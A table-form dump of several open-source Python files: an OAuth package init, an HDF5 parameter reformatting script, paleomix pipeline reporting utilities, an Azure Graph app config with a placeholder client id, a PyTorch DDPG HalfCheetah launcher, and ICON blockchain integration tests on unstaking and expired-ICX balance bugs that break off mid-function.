id (stringlengths 1–8) | text (stringlengths 6–1.05M) | dataset_id (stringclasses, 1 value)
---|---|---|
5168324
|
<filename>xl_auth/oauth/__init__.py<gh_stars>1-10
# -*- coding: utf-8 -*-
"""The OAuth sub-package."""
from __future__ import absolute_import, division, print_function, unicode_literals
from . import client, grant, token, views # noqa
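# Note (added): `# noqa` silences the unused-import warning; these imports
# exist for their side effects, exposing the submodules as attributes of the
# package (e.g. `xl_auth.oauth.views`).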
|
StarcoderdataPython
|
3234337
|
<gh_stars>1-10
import os
import sys

import h5py
import numpy as np

if len(sys.argv) != 2:
    print("usage: python reformat_simulation_parameters.py [hdf5 file]")
    sys.exit(-1)

filename = sys.argv[1]
fout = open(os.path.join(os.path.dirname(filename),
                         'simulation_parameters.csv'), 'w+')
fout.write("parameter,K,N,M,value\n")
print("processing", filename, "...")

f = h5py.File(filename, 'r')
beta = np.array(f['global_concentration'])
pi = np.array(f['local_concentration'])
eta = np.array(f['global_features'])
x = np.array(f['local_features'])
y = np.array(f['observations'])
K = beta.shape[0]
N = pi.shape[0]
M = eta.shape[1]

# Write one CSV row per parameter entry; empty columns mark unused indices.
for k in range(K):
    fout.write("beta,%d,,,%f\n" % (k, beta[k]))
    for n in range(N):
        fout.write("pi,%d,%d,,%f\n" % (k, n, pi[n, k]))
        for m in range(M):
            fout.write("x,%d,%d,%d,%f\n" % (k, n, m, x[n, k, m]))
    for m in range(M):
        fout.write("eta,%d,,%d,%f\n" % (k, m, eta[k, m]))
for n in range(N):
    for m in range(M):
        fout.write("y,,%d,%d,%f\n" % (n, m, y[n, m]))
fout.close()
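# Illustrative read-back helper (added as a sketch; not part of the original
# script): loads the CSV written above into a list of dicts, stdlib only.
def read_parameters_back(path):
    import csv
    with open(path) as fin:
        return list(csv.DictReader(fin))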
|
StarcoderdataPython
|
1976448
|
#!/usr/bin/python3
#
# Copyright (c) 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
from typing import IO, Dict, Iterable, Set, Tuple, Union

from humanfriendly.terminal import ansi_wrap, terminal_supports_colors

from paleomix.common.versions import RequirementError
from paleomix.node import Node
from paleomix.nodegraph import FileStatusCache, NodeGraph


def input_files(nodes: Iterable[Node], file: IO[str] = sys.stdout) -> int:
    input_files: Set[str] = set()
    output_files: Set[str] = set()
    graph, _ = _create_graph(nodes)
    for node in graph.iterflat():
        for filename in node.input_files:
            input_files.add(os.path.abspath(filename))
        for filename in node.output_files:
            output_files.add(os.path.abspath(filename))

    # Files produced by another node are intermediates, not true inputs.
    for filename in sorted(input_files - output_files):
        print(filename, file=file)

    return 0


def output_files(nodes: Iterable[Node], file: IO[str] = sys.stdout) -> int:
    output_files: Dict[str, str] = {}
    graph, cache = _create_graph(nodes)

    def _set_output_file_state(filenames: Iterable[str], state: str) -> None:
        for filename in filenames:
            output_files[os.path.abspath(filename)] = state

    for node in graph.iterflat():
        state = graph.get_node_state(node)
        if state == NodeGraph.DONE:
            _set_output_file_state(node.output_files, "Ready ")
            continue

        # Pending/queued nodes may have outdated output files
        missing_files = frozenset(cache.missing_files(node.output_files))
        _set_output_file_state(missing_files, "Missing ")
        _set_output_file_state(node.output_files - missing_files, "Outdated ")

    for filename, state in sorted(output_files.items()):
        print(state, filename, file=file)

    return 0


def required_executables(nodes: Iterable[Node], file: IO[str] = sys.stdout) -> int:
    graph, _ = _create_graph(nodes)
    template = " {: <20s} {: <11s} {}"
    print(template.format("Executable", "Version", "Required version"), file=file)
    for requirement in sorted(graph.requirements, key=lambda it: it.name.lower()):
        try:
            version = requirement.version_str()
        except RequirementError:
            version = "ERROR"

        print(
            template.format(requirement.name, version, requirement.specifiers),
            file=file,
        )

    return 0


def pipeline_tasks(tasks: Iterable[Node], file: IO[str] = sys.stdout) -> int:
    graph, _ = _create_graph(tasks)

    top_tasks = []
    for task, rev_deps in graph._reverse_dependencies.items():
        if not rev_deps:
            top_tasks.append(task)

    # Sort by negative ID to prevent leaf tasks created in the middle of a
    # pipeline from being shown first. These tasks typically generate
    # reports/files for the user.
    top_tasks.sort(key=lambda task: -task.id)

    printer = _TaskPrinter(graph, file)
    for task in top_tasks:
        printer.print(task)

    return 0


class _TaskPrinter:
    def __init__(self, graph: NodeGraph, file: IO[str]) -> None:
        self._cache = set()
        self._graph = graph
        self._file = file
        self.supports_colors = terminal_supports_colors()

    def print(self, task: Node, indent: int = 0) -> None:
        text = "{}+ {}".format(" " * indent, task)
        if self._is_task_done(task):
            text = self._color_done(text)
        print(text, file=self._file)

        self._cache.add(task)
        skipped_tasks = 0
        skipped_tasks_done = True
        for subtask in task.dependencies:
            if subtask in self._cache:
                skipped_tasks += 1
                skipped_tasks_done &= self._is_task_done(subtask)
                continue

            self.print(subtask, indent + 4)

        if skipped_tasks:
            text = "{}+ {} sub-task(s) ...".format(" " * (indent + 4), skipped_tasks)
            if skipped_tasks_done:
                text = self._color_done(text)
            print(text, file=self._file)

    def _is_task_done(self, task: Node) -> bool:
        return self._graph.get_node_state(task) == self._graph.DONE

    def _color_done(self, value: Union[str, Node]) -> str:
        if self.supports_colors:
            return ansi_wrap(str(value), color="black", bold=True)
        return str(value)


def _create_graph(nodes: Iterable[Node]) -> Tuple[NodeGraph, FileStatusCache]:
    cache = FileStatusCache()
    graph = NodeGraph(
        nodes=nodes,
        implicit_dependencies=True,
        cache_factory=lambda: cache,
    )
    return graph, cache
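# Minimal usage sketch (added for illustration; `my_nodes` stands in for an
# iterable of constructed paleomix Node objects):
#
#   input_files(my_nodes)           # external inputs not produced by any node
#   output_files(my_nodes)          # outputs tagged Ready/Missing/Outdated
#   required_executables(my_nodes)  # table of executables and their versions
#   pipeline_tasks(my_nodes)        # indented task tree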
|
StarcoderdataPython
|
3562903
|
"""
Configuration settings for the Værmelder Python console app.
See
https://docs.microsoft.com/en-us/graph/auth-register-app-v2
for further information and a tutorial.
"""
"""
Azure Active Directory app client id.
Caution:
Changes required.
Edit this with your generated and secret id.
"""
CLIENT_ID = '<INSERT CLIENT ID>'
"""
App name.
No changes required.
"""
APP_NAME = 'vaermelder-python'
"""
Authority url.
No changes required.
"""
AUTHORITY_URL = 'https://login.microsoftonline.com/common'
"""
Resource identifier url.
No changes required.
"""
RESOURCE = 'https://graph.microsoft.com'
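# Illustrative sketch (added; the original app's auth code is not shown here,
# and the `msal` package is an assumption) of how these settings are
# typically consumed:
def acquire_token_example():
    import msal
    app = msal.PublicClientApplication(CLIENT_ID, authority=AUTHORITY_URL)
    # Request a token for Microsoft Graph using the default scope.
    return app.acquire_token_interactive(scopes=[RESOURCE + '/.default'])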
|
StarcoderdataPython
|
8155997
|
<gh_stars>0
"""
Run PyTorch DDPG on HalfCheetah.
"""
import random

from railrl.exploration_strategies.base import (
    PolicyWrappedWithExplorationStrategy,
)
from railrl.exploration_strategies.ou_strategy import OUStrategy
from railrl.launchers.launcher_util import run_experiment
from railrl.torch.networks import FeedForwardQFunction, FeedForwardPolicy
from railrl.torch.ddpg.ddpg import DDPG
import railrl.torch.pytorch_util as ptu
from rllab.envs.mujoco.half_cheetah_env import HalfCheetahEnv
from rllab.envs.normalized_env import normalize


def example(variant):
    env = HalfCheetahEnv()
    if variant['normalize']:
        env = normalize(env)
    es = OUStrategy(action_space=env.action_space)
    # Two hidden layers of 32 units each for both the Q-function and policy.
    qf = FeedForwardQFunction(
        int(env.observation_space.flat_dim),
        int(env.action_space.flat_dim),
        32,
        32,
    )
    policy = FeedForwardPolicy(
        int(env.observation_space.flat_dim),
        int(env.action_space.flat_dim),
        32,
        32,
    )
    exploration_policy = PolicyWrappedWithExplorationStrategy(
        exploration_strategy=es,
        policy=policy,
    )
    algorithm = DDPG(
        env,
        qf=qf,
        policy=policy,
        exploration_policy=exploration_policy,
        **variant['algo_params']
    )
    algorithm.to(ptu.device)
    algorithm.train()


if __name__ == "__main__":
    # noinspection PyTypeChecker
    variant = dict(
        algo_params=dict(
            num_epochs=99,
            num_steps_per_epoch=10000,
            num_steps_per_eval=1000,
            use_soft_update=True,
            tau=1e-2,
            batch_size=128,
            max_path_length=1000,
            discount=0.99,
            qf_learning_rate=1e-3,
            policy_learning_rate=1e-4,
        ),
        version="PyTorch - bigger networks",
        normalize=False,
        size='32',
    )
    # Launch three runs with independent random seeds.
    for _ in range(3):
        seed = random.randint(0, 999999)
        run_experiment(
            example,
            exp_prefix="ddpg-half-cheetah-check-clean",
            seed=seed,
            mode='ec2',
            variant=variant,
            use_gpu=False,
        )
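# For reference (added): OUStrategy perturbs actions with temporally
# correlated Ornstein-Uhlenbeck noise. A minimal sketch of the update rule
# (parameter names are illustrative, not railrl's actual signature):
#
#   def ou_step(x, mu=0.0, theta=0.15, sigma=0.3, dt=1.0):
#       return x + theta * (mu - x) * dt + sigma * dt ** 0.5 * np.random.randn()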
|
StarcoderdataPython
|
8092989
|
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""IconScoreEngine testcase
"""
import json
import os
from typing import TYPE_CHECKING, List, Tuple
from unittest.mock import patch
from iconservice.icon_constant import Revision, ICX_IN_LOOP, ConfigKey
from iconservice.icx.coin_part import CoinPart, CoinPartFlag
from iconservice.icx.stake_part import StakePart
from iconservice.icx.unstake_patcher import INVALID_EXPIRED_UNSTAKES_FILENAME
from iconservice.icx.unstake_patcher import UnstakePatcher, Target
from tests.integrate_test.iiss.test_iiss_base import TestIISSBase
if TYPE_CHECKING:
    from iconservice.iconscore.icon_score_result import TransactionResult
    from tests.integrate_test.test_integrate_base import EOAAccount
class TestIISSUnStake1(TestIISSBase):
    def test_unstake_balance_rev_10(self):
        self._test_unstake_balance(
            rev=Revision.FIX_UNSTAKE_BUG.value,
            expected_expired_unstake_cnt=2,
            expected_last_balance=0
        )

    def test_unstake_balance_rev_11(self):
        self._test_unstake_balance(
            rev=Revision.FIX_BALANCE_BUG.value,
            expected_expired_unstake_cnt=3,
            expected_last_balance=1 * ICX_IN_LOOP
        )

    def _test_unstake_balance(
            self,
            rev: int,
            expected_expired_unstake_cnt: int,
            expected_last_balance: int
    ):
        self.init_decentralized()
        self.init_inv()

        # gain 10 icx
        balance: int = 10 * ICX_IN_LOOP
        self.distribute_icx(
            accounts=self._accounts[:1],
            init_balance=balance
        )

        # set stake
        target_stake: int = 8
        stake: int = target_stake * ICX_IN_LOOP
        tx_results: List['TransactionResult'] = self.set_stake(
            from_=self._accounts[0],
            value=stake
        )
        # A transaction's fee is the steps it used times the step price.
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance: int = balance - stake - fee
        response: int = self.get_balance(self._accounts[0])
        self.assertEqual(expected_balance, response)

        self.set_revision(Revision.MULTIPLE_UNSTAKE.value)

        # lower the stake by 1 icx, six times, creating six unstake slots
        for i in range(6):
            self.set_stake(
                from_=self._accounts[0],
                value=stake - (i + 1) * ICX_IN_LOOP
            )
        last_balance: int = self.get_balance(self._accounts[0])

        actual_res: dict = self.get_stake(self._accounts[0])
        first_remaining_blocks: int = 14
        expected_res = {
            "stake": stake - 1 * ICX_IN_LOOP * 6,
            "unstakes": [
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 70, "remainingBlocks": first_remaining_blocks},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 71, "remainingBlocks": first_remaining_blocks + 1},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 72, "remainingBlocks": first_remaining_blocks + 2},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": first_remaining_blocks + 3},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": first_remaining_blocks + 4},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": first_remaining_blocks + 5},
            ]
        }
        self.assertEqual(expected_res, actual_res)

        self.set_revision(rev)

        # 1st expired unstake
        self.make_empty_blocks(first_remaining_blocks)
        res: dict = self.get_stake(self._accounts[0])
        expected_res = {
            "stake": stake - 1 * ICX_IN_LOOP * 6,
            "unstakes": [
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 71, "remainingBlocks": 0},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 72, "remainingBlocks": 1},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": 2},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 3},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 4},
            ]
        }
        self.assertEqual(res, expected_res)

        tx_results = self.transfer_icx(from_=self._accounts[0], to_=self._accounts[1], value=0)
        res: dict = self.get_stake(self._accounts[0])
        expected_res = {
            "stake": stake - 1 * ICX_IN_LOOP * 6,
            "unstakes": [
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 72, "remainingBlocks": 0},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": 1},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 2},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 3},
            ]
        }
        self.assertEqual(res, expected_res)
        estimate_fee = tx_results[1].step_used * tx_results[1].step_price

        # 2nd expired unstake
        self.make_empty_blocks(1)
        res: dict = self.get_stake(self._accounts[0])
        expected_res = {
            "stake": stake - 1 * ICX_IN_LOOP * 6,
            "unstakes": [
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 73, "remainingBlocks": 0},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 1},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 2},
            ]
        }
        self.assertEqual(res, expected_res)

        current_balance: int = self.get_balance(self._accounts[0])
        expected_expired_stake_balance: int = 1 * ICX_IN_LOOP * expected_expired_unstake_cnt
        expected_balance: int = last_balance + expected_expired_stake_balance - estimate_fee
        self.assertEqual(current_balance, expected_balance)

        self.transfer_icx(
            from_=self._accounts[0],
            to_=self._accounts[1],
            value=expected_balance - estimate_fee,
            disable_pre_validate=True,
            step_limit=100_000,
            expected_status=True
        )
        res: dict = self.get_stake(self._accounts[0])
        expected_res = {
            "stake": stake - 1 * ICX_IN_LOOP * 6,
            "unstakes": [
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 74, "remainingBlocks": 0},
                {"unstake": 1 * ICX_IN_LOOP, "unstakeBlockHeight": 75, "remainingBlocks": 1},
            ]
        }
        self.assertEqual(res, expected_res)

        balance: int = self.get_balance(self._accounts[0])
        self.assertEqual(balance, expected_last_balance)
class TestIISSUnStake2(TestIISSBase):
    def tearDown(self):
        super().tearDown()
        names: List[str] = INVALID_EXPIRED_UNSTAKES_FILENAME.split(".")
        log_dir = "."
        report_path: str = os.path.join(log_dir, f"{names[0]}_report.json")
        if os.path.isfile(report_path):
            os.remove(report_path)

    def _setup(
            self,
            init_balance: int,
            stake: int,
            unstake_count: int = 1,
            account_count: int = 1
    ) -> list:
        self.init_decentralized()
        self.init_inv()
        self.set_revision(Revision.MULTIPLE_UNSTAKE.value)

        # gain 150 icx
        self.distribute_icx(
            accounts=self._accounts[:account_count],
            init_balance=init_balance
        )
        for i in range(account_count):
            self._accounts[i].balance = init_balance

        # Balance | Stake   | UnStake | Expired_icx
        # 150 icx | 0 icx   | 0 icx   | 0 icx

        # set stake
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_stake_tx(from_=self._accounts[i], value=stake)
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - stake - fee
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
            self._accounts[i].balance = expected_balance

        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 100 icx | 0 icx   | 0 icx

        # unstake (unstake_count - 1) times
        tx_list = []
        unstake = stake // unstake_count
        for i in range(unstake_count - 1):
            for j in range(account_count):
                unstake_value = (i + 1) * unstake
                tx = self.create_set_stake_tx(from_=self._accounts[j], value=stake - unstake_value)
                tx_list.append(tx)
            tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
            for j in range(account_count):
                fee = tx_results[j + 1].step_used * tx_results[j + 1].step_price
                expected_balance = self._accounts[j].balance - fee
                self.assertEqual(expected_balance, self.get_balance(self._accounts[j]))
                self._accounts[j].balance = expected_balance

        # unstake all staked value
        tx_list = []
        for i in range(account_count):
            tx = self.create_set_stake_tx(from_=self._accounts[i], value=0)
            tx_list.append(tx)
        tx_results: List['TransactionResult'] = self.process_confirm_block_tx(tx_list=tx_list)
        for i in range(account_count):
            fee = tx_results[i + 1].step_used * tx_results[i + 1].step_price
            expected_balance = self._accounts[i].balance - fee
            self.assertEqual(expected_balance, self.get_balance(self._accounts[i]))
            self._accounts[i].balance = expected_balance

        # Balance | Stake   | UnStake | Expired_icx
        # 50 icx  | 0 icx   | 100 icx | 0 icx

        # wait expire unstake
        remaining_blocks = 0
        rets = []
        for i in range(account_count):
            unstakes_info: list = self.get_stake(self._accounts[i]).get("unstakes")
            rets.append(unstakes_info)
            unstake_info = unstakes_info[-1]
            remaining_blocks = unstake_info["remainingBlocks"]
        self.make_empty_blocks(remaining_blocks + 1)

        # Balance | Stake   | UnStake    | Expired_icx
        # 50 icx  | 0 icx   | 100 icx(e) | 100 icx
        return rets
    def test_expired_icx_case1(self):
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake
        )

        # transfer 10 icx to other account
        expired_icx = stake
        transfer_value = 10 * ICX_IN_LOOP
        tx_results = self.transfer_icx(self._accounts[0], self._accounts[1], transfer_value)
        fee = tx_results[1].step_used * tx_results[1].step_price
        transfer_fee: int = fee

        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake]
        # Balance | Stake | UnStake    | Expired_icx
        # 40 icx  | 0 icx | 100 icx(e) | 100 icx
        self._check_expired_icx(expired_icx, expired_unstakes_info)

        # gain unstaked icx
        # Balance | Stake | UnStake    | Expired_icx
        # 140 icx | 0 icx | 100 icx(e) | 0 icx
        expected_balance = self._accounts[0].balance - transfer_value - fee + stake
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # set stake to 30
        stake = 30 * ICX_IN_LOOP
        tx_results: List['TransactionResult'] = self.set_stake(
            from_=self._accounts[0],
            value=stake
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        # Balance | Stake  | UnStake | Expired_icx
        # 210 icx | 30 icx | 0 icx   | 0 icx
        expected_balance = self._accounts[0].balance - stake - fee + expired_icx
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        response_stake = self.get_stake(self._accounts[0])
        self.assertEqual(stake, response_stake["stake"])
        self._check_expired_icx_release()

        # account can transfer invalid expired icx all
        self.transfer_icx(
            self._accounts[0],
            self._accounts[1],
            self._accounts[0].balance - transfer_fee,
            step_limit=100_000,
        )
        actual_balance: int = self.get_balance(account=self._accounts[0])
        self.assertEqual(0, actual_balance)
        # Balance | Stake  | UnStake | Expired_icx
        # 0 icx   | 30 icx | 0 icx   | 0 icx
        response_stake = self.get_stake(self._accounts[0])
        self.assertEqual(stake, response_stake["stake"])
        self._check_expired_icx_release()
    def test_multiple_expired_icx(self):
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake,
            unstake_count=2
        )

        # transfer 10 icx to other account
        expired_icx = stake
        transfer_value = 10 * ICX_IN_LOOP
        tx_results = self.transfer_icx(
            self._accounts[0],
            self._accounts[1],
            transfer_value
        )
        fee = tx_results[1].step_used * tx_results[1].step_price

        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake1 = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstake2 = (
            account0_unstakes_info[1]["unstake"],
            account0_unstakes_info[1]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake1, expired_unstake2]
        # Balance | Stake | UnStake    | Expired_icx
        # 40 icx  | 0 icx | 100 icx(e) | 100 icx
        self._check_expired_icx(expired_icx, expired_unstakes_info)

        # gain unstaked icx
        # Balance | Stake | UnStake    | Expired_icx
        # 140 icx | 0 icx | 100 icx(e) | 0 icx
        expected_balance = self._accounts[0].balance - transfer_value - fee + stake
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # fix unstake bug
        self.set_revision(Revision.FIX_UNSTAKE_BUG.value)

        # transfer 10 icx to other account
        transfer_value = 10 * ICX_IN_LOOP
        tx_results = self.transfer_icx(
            self._accounts[0],
            self._accounts[1],
            transfer_value
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        transfer_fee: int = fee

        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake1 = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstake2 = (
            account0_unstakes_info[1]["unstake"],
            account0_unstakes_info[1]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake1, expired_unstake2]
        self._check_expired_icx(expired_icx, expired_unstakes_info)

        # invalid expired icx will not be produced
        # Balance | Stake | UnStake    | Expired_icx
        # 130 icx | 0 icx | 100 icx(e) | 0 icx
        expected_balance = self._accounts[0].balance - transfer_value - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance

        # set stake to 30
        stake = 30 * ICX_IN_LOOP
        tx_results: List['TransactionResult'] = self.set_stake(
            from_=self._accounts[0],
            value=stake
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        # Balance | Stake  | UnStake | Expired_icx
        # 200 icx | 30 icx | 0 icx   | 0 icx
        expected_balance = self._accounts[0].balance - stake - fee + expired_icx
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        response_stake = self.get_stake(self._accounts[0])
        self.assertEqual(stake, response_stake["stake"])
        self._check_expired_icx_release()

        # account can transfer invalid expired icx all
        self.transfer_icx(
            self._accounts[0],
            self._accounts[1],
            self._accounts[0].balance - transfer_fee,
            step_limit=100_000,
        )
        actual_balance: int = self.get_balance(account=self._accounts[0])
        self.assertEqual(0, actual_balance)
        # Balance | Stake  | UnStake | Expired_icx
        # 0 icx   | 30 icx | 0 icx   | 0 icx
        response_stake = self.get_stake(self._accounts[0])
        self.assertEqual(stake, response_stake["stake"])
        self._check_expired_icx_release()
    def test_expired_icx_case2_1_gain_icx(self):
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake
        )

        # delegation
        expired_icx: int = stake

        def set_delegation():
            _tx_results: List["TransactionResult"] = self.set_delegation(
                from_=self._accounts[0],
                origin_delegations=[
                    (
                        self._accounts[0],
                        0
                    )
                ]
            )
            _fee = _tx_results[1].step_used * _tx_results[1].step_price
            _expected_balance = self._accounts[0].balance - _fee + expired_icx
            self.assertEqual(_expected_balance, self.get_balance(self._accounts[0]))
            self._accounts[0].balance = _expected_balance

        set_delegation()

        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstake_info = [expired_unstake]
        # check expired_icx 1
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstake_info
        )
        # Balance | Stake | UnStake    | Expired_icx
        # 150 icx | 0 icx | 100 icx(e) | 100 icx

        set_delegation()
        # check expired_icx 2
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstake_info
        )
        # Balance | Stake | UnStake    | Expired_icx
        # 250 icx | 0 icx | 100 icx(e) | 100 icx

        # Fix Unstake Bug
        self.set_revision(Revision.FIX_UNSTAKE_BUG.value)

        # Try Again
        set_delegation()
        # check expired_icx 3
        self._check_expired_icx_release()
        # Balance | Stake | UnStake  | Expired_icx
        # 350 icx | 0 icx | 0 icx(e) | 0 icx

        tx_results: List["TransactionResult"] = self.set_delegation(
            from_=self._accounts[0],
            origin_delegations=[
                (
                    self._accounts[0],
                    0
                )
            ]
        )
        fee = tx_results[1].step_used * tx_results[1].step_price
        expected_balance = self._accounts[0].balance - fee
        self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
        self._accounts[0].balance = expected_balance
        # check expired_icx 4
        self._check_expired_icx_release()
        # Balance | Stake | UnStake  | Expired_icx
        # 350 icx | 0 icx | 0 icx(e) | 0 icx
    def test_expired_icx_case2_2_transfer_icx(self):
        initial_balance: int = 150 * ICX_IN_LOOP
        stake: int = 100 * ICX_IN_LOOP
        unstakes_info_per_account: list = self._setup(
            init_balance=initial_balance,
            stake=stake
        )
        expired_icx: int = stake

        # transfer icx 10
        transfer_value = 10 * ICX_IN_LOOP
        tx_results = self.transfer_icx(self._accounts[0], self._accounts[1], transfer_value)
        fee = tx_results[1].step_used * tx_results[1].step_price
        transfer_fee: int = fee

        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstakes_info = [expired_unstake]
        # Balance | Stake | UnStake    | Expired_icx
        # 40 icx  | 0 icx | 100 icx(e) | 100 icx
        self._check_expired_icx(expired_icx, expired_unstakes_info)
        self._accounts[0].balance = self.get_balance(self._accounts[0])

        # delegation
        def set_delegation():
            _tx_results: List["TransactionResult"] = self.set_delegation(
                from_=self._accounts[0],
                origin_delegations=[
                    (
                        self._accounts[0],
                        0
                    )
                ]
            )
            _fee = _tx_results[1].step_used * _tx_results[1].step_price
            expected_balance = self._accounts[0].balance - _fee + expired_icx
            self.assertEqual(expected_balance, self.get_balance(self._accounts[0]))
            self._accounts[0].balance = expected_balance

        set_delegation()

        account0_unstakes_info = unstakes_info_per_account[0]
        expired_unstake = (
            account0_unstakes_info[0]["unstake"],
            account0_unstakes_info[0]["unstakeBlockHeight"]
        )
        expired_unstake_info = [expired_unstake]
        # check expired_icx 1
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstake_info
        )
        # Balance | Stake | UnStake    | Expired_icx
        # 140 icx | 0 icx | 100 icx(e) | 100 icx

        set_delegation()
        # check expired_icx 2
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstake_info
        )
        # Balance | Stake | UnStake    | Expired_icx
        # 240 icx | 0 icx | 100 icx(e) | 100 icx

        # account can transfer invalid expired icx all
        self.transfer_icx(
            self._accounts[0],
            self._accounts[1],
            self._accounts[0].balance - transfer_fee,
            step_limit=100_000,
        )
        actual_balance: int = self.get_balance(account=self._accounts[0])
        self.assertEqual(0, actual_balance)
        # Balance | Stake | UnStake | Expired_icx
        # 0 icx   | 0 icx | 0 icx   | 100 icx
        self._check_expired_icx(
            expired_icx=expired_icx,
            expired_unstakes_info=expired_unstake_info
        )
    def _get_account_info(self, account: 'EOAAccount') -> dict:
        c_key: bytes = CoinPart.make_key(account.address)
        value: bytes = self.get_state_db(c_key)
        coin_part: 'CoinPart' = CoinPart.from_bytes(value)
        s_key: bytes = StakePart.make_key(account.address)
        value: bytes = self.get_state_db(s_key)
        state_part: 'StakePart' = StakePart.from_bytes(value)
        return {
            "coin": coin_part,
            "stake": state_part
        }

    def _check_expired_icx(self, expired_icx: int,
                           expired_unstakes_info: List[Tuple[int, int]], account_count: int = 1):
        for i in range(account_count):
            get_stake_info: dict = self.get_stake(self._accounts[i])
            self.assertNotIn("unstakes", get_stake_info)
            db_info: dict = self._get_account_info(self._accounts[i])
            unstakes_info: list = db_info["stake"]._unstakes_info
            flag: CoinPartFlag = db_info["coin"].flags
